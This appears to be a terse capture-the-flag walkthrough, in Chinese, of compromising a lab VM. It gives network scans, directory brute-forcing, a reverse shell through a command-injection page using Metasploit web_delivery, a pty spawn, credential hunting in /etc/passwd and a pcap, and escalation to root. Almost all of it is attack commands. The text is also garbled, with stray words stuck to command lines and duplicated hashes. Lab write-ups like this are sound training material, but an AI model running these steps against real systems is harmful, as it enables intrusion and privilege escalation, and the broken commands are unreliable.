netdiscover -i eth0 -r 192.168.118.0/24php
nmap -sP -T4 192.168.118.0/24html
nmap -sS -T4 -sV -O -p- 192.168.118.146python
view-source:http://192.168.118.146:33447/web
643239334c6d70775a773d3d ==》 wow.jpgshell
notepad++ 打開 bash
3761656530663664353838656439393035656533376631366137633631306434tcp
==》spa
7aee0f6d588ed9905ee37f16a7c610d43d
7aee0f6d588ed9905ee37f16a7c610d4htm
MD5 解密==》63425 (後面發現並沒什麼卵用)
1.5 dirbuster爆破
標題倆個路徑:
http://192.168.118.146:33447/Challenge/
http://192.168.118.146:33447/Challenge/cake.php
==>
/Magic_Box
再次爆破目錄:
http://192.168.118.146:33447/Challenge/Magic_Box/command.php
http://192.168.118.146:33447/Challenge/Magic_Box/command.php
use exploit/multi/script/web_delivery
su: must be run from a terminal
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
cat /etc/passwd,發現須要關注的用戶有:acid,saman,root
find / -user acid 2>/dev/null
發一個hint.pcapng
打開後跟蹤tcp流
發現saman的密碼:1337hax0r
su提權到saman、root,得到flag
再使用sudo -i 提權到root,密碼一樣是1337hax0r,得到位於root目錄的flag.txt
一、查找acid用戶的文件
find / -user acid 2>/dev/null
二、使用metasploit反彈shell
exploit/multi/script/web_delivery